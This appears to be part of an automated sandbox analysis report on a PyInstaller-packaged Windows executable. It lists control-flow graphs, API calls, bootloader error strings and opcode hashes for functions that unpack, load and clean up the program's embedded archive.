                                                                                                                                                                                                                                                                    control_flow_graph 62 7ff7c2661000-7ff7c2663806 call 7ff7c266fe88 call 7ff7c266fe90 call 7ff7c266c8c0 call 7ff7c2675460 call 7ff7c26754f4 call 7ff7c26636b0 76 7ff7c2663808-7ff7c266380f 62->76 77 7ff7c2663814-7ff7c2663836 call 7ff7c2661950 62->77 78 7ff7c2663c97-7ff7c2663cb2 call 7ff7c266c5c0 76->78 82 7ff7c266383c-7ff7c2663856 call 7ff7c2661c80 77->82 83 7ff7c266391b-7ff7c2663931 call 7ff7c26645b0 77->83 87 7ff7c266385b-7ff7c266389b call 7ff7c2668a20 82->87 90 7ff7c266396a-7ff7c266397f call 7ff7c2662710 83->90 91 7ff7c2663933-7ff7c2663960 call 7ff7c2667f80 83->91 96 7ff7c266389d-7ff7c26638a3 87->96 97 7ff7c26638c1-7ff7c26638cc call 7ff7c2674fa0 87->97 101 7ff7c2663c8f 90->101 99 7ff7c2663984-7ff7c26639a6 call 7ff7c2661c80 91->99 100 7ff7c2663962-7ff7c2663965 call 7ff7c26700bc 91->100 102 7ff7c26638a5-7ff7c26638ad 96->102 103 7ff7c26638af-7ff7c26638bd call 7ff7c2668b90 96->103 109 7ff7c26639fc-7ff7c2663a2a call 7ff7c2668b30 call 7ff7c2668b90 * 3 97->109 110 7ff7c26638d2-7ff7c26638e1 call 7ff7c2668a20 97->110 115 7ff7c26639b0-7ff7c26639b9 99->115 100->90 101->78 102->103 103->97 138 7ff7c2663a2f-7ff7c2663a3e call 7ff7c2668a20 109->138 119 7ff7c26638e7-7ff7c26638ed 110->119 120 7ff7c26639f4-7ff7c26639f7 call 7ff7c2674fa0 110->120 115->115 118 7ff7c26639bb-7ff7c26639d8 call 7ff7c2661950 115->118 118->87 130 7ff7c26639de-7ff7c26639ef call 7ff7c2662710 118->130 124 7ff7c26638f0-7ff7c26638fc 119->124 120->109 127 7ff7c26638fe-7ff7c2663903 124->127 128 7ff7c2663905-7ff7c2663908 124->128 127->124 127->128 128->120 131 7ff7c266390e-7ff7c2663916 call 7ff7c2674fa0 128->131 130->101 131->138 141 7ff7c2663a44-7ff7c2663a47 138->141 142 7ff7c2663b45-7ff7c2663b53 138->142 141->142 145 7ff7c2663a4d-7ff7c2663a50 141->145 143 7ff7c2663a67 142->143 144 7ff7c2663b59-7ff7c2663b5d 142->144 146 7ff7c2663a6b-7ff7c2663a90 call 7ff7c2674fa0 143->146 144->146 147 7ff7c2663b14-7ff7c2663b17 145->147 148 7ff7c2663a56-7ff7c2663a5a 145->148 157 7ff7c2663aab-7ff7c2663ac0 146->157 158 7ff7c2663a92-7ff7c2663aa6 call 7ff7c2668b30 146->158 149 7ff7c2663b19-7ff7c2663b1d 147->149 150 7ff7c2663b2f-7ff7c2663b40 call 7ff7c2662710 147->150 148->147 152 7ff7c2663a60 148->152 149->150 153 7ff7c2663b1f-7ff7c2663b2a 149->153 159 7ff7c2663c7f-7ff7c2663c87 150->159 152->143 153->146 161 7ff7c2663be8-7ff7c2663bfa call 7ff7c2668a20 157->161 162 7ff7c2663ac6-7ff7c2663aca 157->162 158->157 159->101 170 7ff7c2663bfc-7ff7c2663c02 161->170 171 7ff7c2663c2e 161->171 164 7ff7c2663bcd-7ff7c2663be2 call 7ff7c2661940 162->164 165 7ff7c2663ad0-7ff7c2663ae8 call 7ff7c26752c0 162->165 164->161 164->162 175 7ff7c2663aea-7ff7c2663b02 call 7ff7c26752c0 165->175 176 7ff7c2663b62-7ff7c2663b7a call 7ff7c26752c0 165->176 173 7ff7c2663c1e-7ff7c2663c2c 170->173 174 7ff7c2663c04-7ff7c2663c1c 170->174 177 7ff7c2663c31-7ff7c2663c40 call 7ff7c2674fa0 171->177 173->177 174->177 175->164 188 7ff7c2663b08-7ff7c2663b0f 175->188 186 7ff7c2663b7c-7ff7c2663b80 176->186 187 7ff7c2663b87-7ff7c2663b9f call 7ff7c26752c0 176->187 184 7ff7c2663c46-7ff7c2663c4a 177->184 185 7ff7c2663d41-7ff7c2663d63 call 7ff7c26644d0 177->185 189 7ff7c2663cd4-7ff7c2663ce6 call 7ff7c2668a20 184->189 190 7ff7c2663c50-7ff7c2663c5f call 7ff7c26690e0 184->190 199 7ff7c2663d65-7ff7c2663d6f call 7ff7c2664620 185->199 200 7ff7c2663d71-7ff7c2663d82 call 7ff7c2661c80 185->200 186->187 201 7ff7c2663bac-7ff7c2663bc4 call 7ff7c26752c0 187->201 202 7ff7c2663ba1-7ff7c2663ba5 187->202 188->164 206 7ff7c2663ce8-7ff7c2663ceb 189->206 207 7ff7c2663d35-7ff7c2663d3c 189->207 204 7ff7c2663cb3-7ff7c2663cb6 call 7ff7c2668850 190->204 205 7ff7c2663c61 190->205 214 7ff7c2663d87-7ff7c2663d96 199->214 200->214 201->164 216 7ff7c2663bc6 201->216 202->201 221 7ff7c2663cbb-7ff7c2663cbd 204->221 211 7ff7c2663c68 call 7ff7c2662710 205->211 206->207 212 7ff7c2663ced-7ff7c2663d10 call 7ff7c2661c80 206->212 207->211 224 7ff7c2663c6d-7ff7c2663c77 211->224 229 7ff7c2663d2b-7ff7c2663d33 call 7ff7c2674fa0 212->229 230 7ff7c2663d12-7ff7c2663d26 call 7ff7c2662710 call 7ff7c2674fa0 212->230 219 7ff7c2663d98-7ff7c2663d9f 214->219 220 7ff7c2663dc4-7ff7c2663dda call 7ff7c2669400 214->220 216->164 219->220 226 7ff7c2663da1-7ff7c2663da5 219->226 232 7ff7c2663ddc 220->232 233 7ff7c2663de8-7ff7c2663e04 SetDllDirectoryW 220->233 222 7ff7c2663cc8-7ff7c2663ccf 221->222 223 7ff7c2663cbf-7ff7c2663cc6 221->223 222->214 223->211 224->159 226->220 231 7ff7c2663da7-7ff7c2663dbe SetDllDirectoryW LoadLibraryExW 226->231 229->214 230->224 231->220 232->233 237 7ff7c2663e0a-7ff7c2663e19 call 7ff7c2668a20 233->237 238 7ff7c2663f01-7ff7c2663f08 233->238 251 7ff7c2663e1b-7ff7c2663e21 237->251 252 7ff7c2663e32-7ff7c2663e3c call 7ff7c2674fa0 237->252 242 7ff7c2663ffc-7ff7c2664004 238->242 243 7ff7c2663f0e-7ff7c2663f15 238->243 245 7ff7c2664029-7ff7c266405b call 7ff7c26636a0 call 7ff7c2663360 call 7ff7c2663670 call 7ff7c2666fb0 call 7ff7c2666d60 242->245 246 7ff7c2664006-7ff7c2664023 PostMessageW GetMessageW 242->246 243->242 244 7ff7c2663f1b-7ff7c2663f25 call 7ff7c26633c0 243->244 244->224 258 7ff7c2663f2b-7ff7c2663f3f call 7ff7c26690c0 244->258 246->245 255 7ff7c2663e2d-7ff7c2663e2f 251->255 256 7ff7c2663e23-7ff7c2663e2b 251->256 263 7ff7c2663ef2-7ff7c2663efc call 7ff7c2668b30 252->263 264 7ff7c2663e42-7ff7c2663e48 252->264 255->252 256->255 269 7ff7c2663f64-7ff7c2663fa0 call 7ff7c2668b30 call 7ff7c2668bd0 call 7ff7c2666fb0 call 7ff7c2666d60 call 7ff7c2668ad0 258->269 270 7ff7c2663f41-7ff7c2663f5e PostMessageW GetMessageW 258->270 263->238 264->263 268 7ff7c2663e4e-7ff7c2663e54 264->268 272 7ff7c2663e56-7ff7c2663e58 268->272 273 7ff7c2663e5f-7ff7c2663e61 268->273 306 7ff7c2663fa5-7ff7c2663fa7 269->306 270->269 274 7ff7c2663e67-7ff7c2663e83 call 7ff7c2666db0 call 7ff7c2667330 272->274 275 7ff7c2663e5a 272->275 273->238 273->274 289 7ff7c2663e8e-7ff7c2663e95 274->289 290 7ff7c2663e85-7ff7c2663e8c 274->290 275->238 293 7ff7c2663e97-7ff7c2663ea4 call 7ff7c2666df0 289->293 294 7ff7c2663eaf-7ff7c2663eb9 call 7ff7c26671a0 289->294 292 7ff7c2663edb-7ff7c2663ef0 call 7ff7c2662a50 call 7ff7c2666fb0 call 7ff7c2666d60 290->292 292->238 293->294 308 7ff7c2663ea6-7ff7c2663ead 293->308 304 7ff7c2663ebb-7ff7c2663ec2 294->304 305 7ff7c2663ec4-7ff7c2663ed2 call 7ff7c26674e0 294->305 304->292 305->238 317 7ff7c2663ed4 305->317 310 7ff7c2663fe9-7ff7c2663ff7 call 7ff7c2661900 306->310 311 7ff7c2663fa9-7ff7c2663fb3 call 7ff7c2669200 306->311 308->292 310->224 311->310 321 7ff7c2663fb5-7ff7c2663fca 311->321 317->292 322 7ff7c2663fcc-7ff7c2663fdf call 7ff7c2662710 call 7ff7c2661900 321->322 323 7ff7c2663fe4 call 7ff7c2662a50 321->323 322->224 323->310
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.1720329401.00007FF7C2661000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C2660000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720292059.00007FF7C2660000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720417432.00007FF7C268B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720455917.00007FF7C269E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720455917.00007FF7C26A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720520244.00007FF7C26A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_7ff7c2660000_X9g8L63QGs.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: ErrorFileLastModuleName
                                                                                                                                                                                                                                                                    • String ID: Could not create temporary directory!$Could not load PyInstaller's embedded PKG archive from the executable (%s)$Could not side-load PyInstaller's PKG archive from external file (%s)$Failed to convert DLL search path!$Failed to initialize security descriptor for temporary directory!$Failed to load Tcl/Tk shared libraries for splash screen!$Failed to load splash screen resources!$Failed to remove temporary directory: %s$Failed to start splash screen!$Failed to unpack splash screen dependencies from PKG archive!$Invalid value in _PYI_PARENT_PROCESS_LEVEL: %s$MEI$PYINSTALLER_RESET_ENVIRONMENT$PYINSTALLER_STRICT_UNPACK_MODE$PYINSTALLER_SUPPRESS_SPLASH_SCREEN$Path exceeds PYI_PATH_MAX limit.$Py_GIL_DISABLED$VCRUNTIME140.dll$_PYI_APPLICATION_HOME_DIR$_PYI_APPLICATION_HOME_DIR not set for onefile child process!$_PYI_ARCHIVE_FILE$_PYI_PARENT_PROCESS_LEVEL$_PYI_SPLASH_IPC$bye-runtime-tmpdir$pkg$pyi-contents-directory$pyi-disable-windowed-traceback$pyi-python-flag
                                                                                                                                                                                                                                                                    • API String ID: 2776309574-3273434969
                                                                                                                                                                                                                                                                    • Opcode ID: 230e5f2fbe18b706386c2e6c5de042c78cdf1bdf29ac743ce162c0a9040f007d
                                                                                                                                                                                                                                                                    • Instruction ID: a126fb637c7a3bb1d0b2850f1203ae32a2a722ba97f7b845208a13040d220de5
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 230e5f2fbe18b706386c2e6c5de042c78cdf1bdf29ac743ce162c0a9040f007d
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 13328021A0868291FB14BF2194543B9A673AF55BA4FC44032DACD63BD6DFBCE568C334
                                                                                                                                                                                                                                                                    Function 00007FF7C26869D4 Relevance: 13.8, APIs: 9, Instructions: 276fileCOMMON
                                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                                    control_flow_graph 536 7ff7c26869d4-7ff7c2686a47 call 7ff7c2686708 539 7ff7c2686a49-7ff7c2686a52 call 7ff7c2674f58 536->539 540 7ff7c2686a61-7ff7c2686a6b call 7ff7c2678590 536->540 545 7ff7c2686a55-7ff7c2686a5c call 7ff7c2674f78 539->545 546 7ff7c2686a6d-7ff7c2686a84 call 7ff7c2674f58 call 7ff7c2674f78 540->546 547 7ff7c2686a86-7ff7c2686aef CreateFileW 540->547 560 7ff7c2686da2-7ff7c2686dc2 545->560 546->545 550 7ff7c2686b6c-7ff7c2686b77 GetFileType 547->550 551 7ff7c2686af1-7ff7c2686af7 547->551 555 7ff7c2686bca-7ff7c2686bd1 550->555 556 7ff7c2686b79-7ff7c2686bb4 GetLastError call 7ff7c2674eec CloseHandle 550->556 552 7ff7c2686b39-7ff7c2686b67 GetLastError call 7ff7c2674eec 551->552 553 7ff7c2686af9-7ff7c2686afd 551->553 552->545 553->552 558 7ff7c2686aff-7ff7c2686b37 CreateFileW 553->558 563 7ff7c2686bd9-7ff7c2686bdc 555->563 564 7ff7c2686bd3-7ff7c2686bd7 555->564 556->545 571 7ff7c2686bba-7ff7c2686bc5 call 7ff7c2674f78 556->571 558->550 558->552 568 7ff7c2686be2-7ff7c2686c37 call 7ff7c26784a8 563->568 569 7ff7c2686bde 563->569 564->568 574 7ff7c2686c39-7ff7c2686c45 call 7ff7c2686910 568->574 575 7ff7c2686c56-7ff7c2686c87 call 7ff7c2686488 568->575 569->568 571->545 574->575 581 7ff7c2686c47 574->581 582 7ff7c2686c8d-7ff7c2686ccf 575->582 583 7ff7c2686c89-7ff7c2686c8b 575->583 584 7ff7c2686c49-7ff7c2686c51 call 7ff7c267ab30 581->584 585 7ff7c2686cf1-7ff7c2686cfc 582->585 586 7ff7c2686cd1-7ff7c2686cd5 582->586 583->584 584->560 588 7ff7c2686d02-7ff7c2686d06 585->588 589 7ff7c2686da0 585->589 586->585 587 7ff7c2686cd7-7ff7c2686cec 586->587 587->585 588->589 591 7ff7c2686d0c-7ff7c2686d51 CloseHandle CreateFileW 588->591 589->560 593 7ff7c2686d86-7ff7c2686d9b 591->593 594 7ff7c2686d53-7ff7c2686d81 GetLastError call 7ff7c2674eec call 7ff7c26786d0 591->594 593->589 594->593
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.1720329401.00007FF7C2661000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C2660000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720292059.00007FF7C2660000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720417432.00007FF7C268B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720455917.00007FF7C269E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720455917.00007FF7C26A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720520244.00007FF7C26A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_7ff7c2660000_X9g8L63QGs.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: File$CreateErrorLast_invalid_parameter_noinfo$CloseHandle$Type
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 1617910340-0
                                                                                                                                                                                                                                                                    • Opcode ID: 4205a6958293653b93a25a06bf68436f7b6b11ca03fe036e6858b65a4e3d069e
                                                                                                                                                                                                                                                                    • Instruction ID: bf498a22dbfba0db295f622562c6cd6d45920bef7404c585b36de946709df130
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4205a6958293653b93a25a06bf68436f7b6b11ca03fe036e6858b65a4e3d069e
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7CC1C232B28A41C5EB10EFA5D4906AC7762F749BA8B414235DFAEA7BD4CF78D451C320
                                                                                                                                                                                                                                                                    Function 00007FF7C26683B0 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 89fileCOMMON
                                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • FindFirstFileW.KERNELBASE(?,00007FF7C2668B09,00007FF7C2663FA5), ref: 00007FF7C266841B
                                                                                                                                                                                                                                                                    • RemoveDirectoryW.KERNEL32(?,00007FF7C2668B09,00007FF7C2663FA5), ref: 00007FF7C266849E
                                                                                                                                                                                                                                                                    • DeleteFileW.KERNELBASE(?,00007FF7C2668B09,00007FF7C2663FA5), ref: 00007FF7C26684BD
                                                                                                                                                                                                                                                                    • FindNextFileW.KERNELBASE(?,00007FF7C2668B09,00007FF7C2663FA5), ref: 00007FF7C26684CB
                                                                                                                                                                                                                                                                    • FindClose.KERNEL32(?,00007FF7C2668B09,00007FF7C2663FA5), ref: 00007FF7C26684DC
                                                                                                                                                                                                                                                                    • RemoveDirectoryW.KERNELBASE(?,00007FF7C2668B09,00007FF7C2663FA5), ref: 00007FF7C26684E5
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.1720329401.00007FF7C2661000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C2660000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720292059.00007FF7C2660000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720417432.00007FF7C268B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720455917.00007FF7C269E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720455917.00007FF7C26A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720520244.00007FF7C26A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_7ff7c2660000_X9g8L63QGs.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: FileFind$DirectoryRemove$CloseDeleteFirstNext
                                                                                                                                                                                                                                                                    • String ID: %s\*
                                                                                                                                                                                                                                                                    • API String ID: 1057558799-766152087
                                                                                                                                                                                                                                                                    • Opcode ID: 754801c57d3e7d892bd8d831a0c0450fb277ac1fd7854ad2b3e1f46bb6674256
                                                                                                                                                                                                                                                                    • Instruction ID: f2a2d82894e5000b1a688513010d50cabaf49ddadbcbdda338003698ae722fa1
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 754801c57d3e7d892bd8d831a0c0450fb277ac1fd7854ad2b3e1f46bb6674256
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 33415F21A0CA4285EA20BF34E4445B9A372FB94764FC00232D5DDA6F95DFBCD54AC734
                                                                                                                                                                                                                                                                    Function 00007FF7C26692F0 Relevance: 3.0, APIs: 2, Instructions: 29COMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.1720329401.00007FF7C2661000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C2660000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720292059.00007FF7C2660000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720417432.00007FF7C268B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720455917.00007FF7C269E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720455917.00007FF7C26A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720520244.00007FF7C26A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_7ff7c2660000_X9g8L63QGs.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: Find$CloseFileFirst
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 2295610775-0
                                                                                                                                                                                                                                                                    • Opcode ID: f8f1f0d53470ef13f354418d29ecb311e48373b0acb6529cbcbe83ca601eafdf
                                                                                                                                                                                                                                                                    • Instruction ID: 26e874244b118fc7e52b1032bab19fe5f4e87fb5eca4fdb226c006e1b1e6809b
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f8f1f0d53470ef13f354418d29ecb311e48373b0acb6529cbcbe83ca601eafdf
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 51F0A932619741C6F7609F60B448776A361AB44334F480235D9ED12BD4DF7CD058C724
                                                                                                                                                                                                                                                                    Function 00007FF7C2680938 Relevance: 2.0, APIs: 1, Instructions: 461COMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.1720329401.00007FF7C2661000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C2660000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720292059.00007FF7C2660000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720417432.00007FF7C268B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720455917.00007FF7C269E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720455917.00007FF7C26A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720520244.00007FF7C26A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_7ff7c2660000_X9g8L63QGs.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: CurrentFeaturePresentProcessProcessor
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 1010374628-0
                                                                                                                                                                                                                                                                    • Opcode ID: 10bf4b1f0472125ada9b1d6b923a92a2d49e498fcbab652d34985a7b27debbff
                                                                                                                                                                                                                                                                    • Instruction ID: 537833f7789efe433464049f8c43aa0ce690b3baae998321ba9228ea96b624f4
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 10bf4b1f0472125ada9b1d6b923a92a2d49e498fcbab652d34985a7b27debbff
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0D026B21A1D642C0FA65BF12A405279E692AF45FB0FC58A34DDDD66BD2DFBDA801C330
                                                                                                                                                                                                                                                                    Function 00007FF7C2661950 Relevance: 22.9, APIs: 2, Strings: 11, Instructions: 184COMMON
                                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                                    control_flow_graph 329 7ff7c2661950-7ff7c266198b call 7ff7c26645b0 332 7ff7c2661c4e-7ff7c2661c72 call 7ff7c266c5c0 329->332 333 7ff7c2661991-7ff7c26619d1 call 7ff7c2667f80 329->333 338 7ff7c2661c3b-7ff7c2661c3e call 7ff7c26700bc 333->338 339 7ff7c26619d7-7ff7c26619e7 call 7ff7c2670744 333->339 342 7ff7c2661c43-7ff7c2661c4b 338->342 344 7ff7c2661a08-7ff7c2661a24 call 7ff7c267040c 339->344 345 7ff7c26619e9-7ff7c2661a03 call 7ff7c2674f78 call 7ff7c2662910 339->345 342->332 351 7ff7c2661a26-7ff7c2661a40 call 7ff7c2674f78 call 7ff7c2662910 344->351 352 7ff7c2661a45-7ff7c2661a5a call 7ff7c2674f98 344->352 345->338 351->338 359 7ff7c2661a5c-7ff7c2661a76 call 7ff7c2674f78 call 7ff7c2662910 352->359 360 7ff7c2661a7b-7ff7c2661afc call 7ff7c2661c80 * 2 call 7ff7c2670744 352->360 359->338 371 7ff7c2661b01-7ff7c2661b14 call 7ff7c2674fb4 360->371 374 7ff7c2661b16-7ff7c2661b30 call 7ff7c2674f78 call 7ff7c2662910 371->374 375 7ff7c2661b35-7ff7c2661b4e call 7ff7c267040c 371->375 374->338 381 7ff7c2661b50-7ff7c2661b6a call 7ff7c2674f78 call 7ff7c2662910 375->381 382 7ff7c2661b6f-7ff7c2661b8b call 7ff7c2670180 375->382 381->338 389 7ff7c2661b9e-7ff7c2661bac 382->389 390 7ff7c2661b8d-7ff7c2661b99 call 7ff7c2662710 382->390 389->338 391 7ff7c2661bb2-7ff7c2661bb9 389->391 390->338 394 7ff7c2661bc1-7ff7c2661bc7 391->394 396 7ff7c2661bc9-7ff7c2661bd6 394->396 397 7ff7c2661be0-7ff7c2661bef 394->397 398 7ff7c2661bf1-7ff7c2661bfa 396->398 397->397 397->398 399 7ff7c2661bfc-7ff7c2661bff 398->399 400 7ff7c2661c0f 398->400 399->400 401 7ff7c2661c01-7ff7c2661c04 399->401 402 7ff7c2661c11-7ff7c2661c24 400->402 401->400 403 7ff7c2661c06-7ff7c2661c09 401->403 404 7ff7c2661c2d-7ff7c2661c39 402->404 405 7ff7c2661c26 402->405 403->400 406 7ff7c2661c0b-7ff7c2661c0d 403->406 404->338 404->394 405->404 406->402
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                      • Part of subcall function 00007FF7C2667F80: _fread_nolock.LIBCMT ref: 00007FF7C266802A
                                                                                                                                                                                                                                                                    • _fread_nolock.LIBCMT ref: 00007FF7C2661A1B
                                                                                                                                                                                                                                                                      • Part of subcall function 00007FF7C2662910: GetCurrentProcessId.KERNEL32(?,?,?,?,00000000,00000000,?,00000000,00007FF7C2661B6A), ref: 00007FF7C266295E
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.1720329401.00007FF7C2661000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C2660000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720292059.00007FF7C2660000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720417432.00007FF7C268B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720455917.00007FF7C269E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720455917.00007FF7C26A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720520244.00007FF7C26A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_7ff7c2660000_X9g8L63QGs.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: _fread_nolock$CurrentProcess
                                                                                                                                                                                                                                                                    • String ID: Could not allocate buffer for TOC!$Could not allocate memory for archive structure!$Could not read full TOC!$Error on file.$Failed to read cookie!$Failed to seek to cookie position!$MEI$calloc$fread$fseek$malloc
                                                                                                                                                                                                                                                                    • API String ID: 2397952137-3497178890
                                                                                                                                                                                                                                                                    • Opcode ID: 7f967e8bf4bd65ccd330245f6cf3beef5728b9bf280203bc786e936cb306ff0d
                                                                                                                                                                                                                                                                    • Instruction ID: 52920b5d223a19b39f35807706df03c52955b73872152158b9657cff46872b77
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 7f967e8bf4bd65ccd330245f6cf3beef5728b9bf280203bc786e936cb306ff0d
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: EF818071A08A82C5E720BF28D0442B9A3B2EB847A4F844431D9CDA7F85DEBCE545C774
                                                                                                                                                                                                                                                                    Function 00007FF7C2661600 Relevance: 22.9, APIs: 1, Strings: 12, Instructions: 145COMMON
                                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                                    • Not Executed
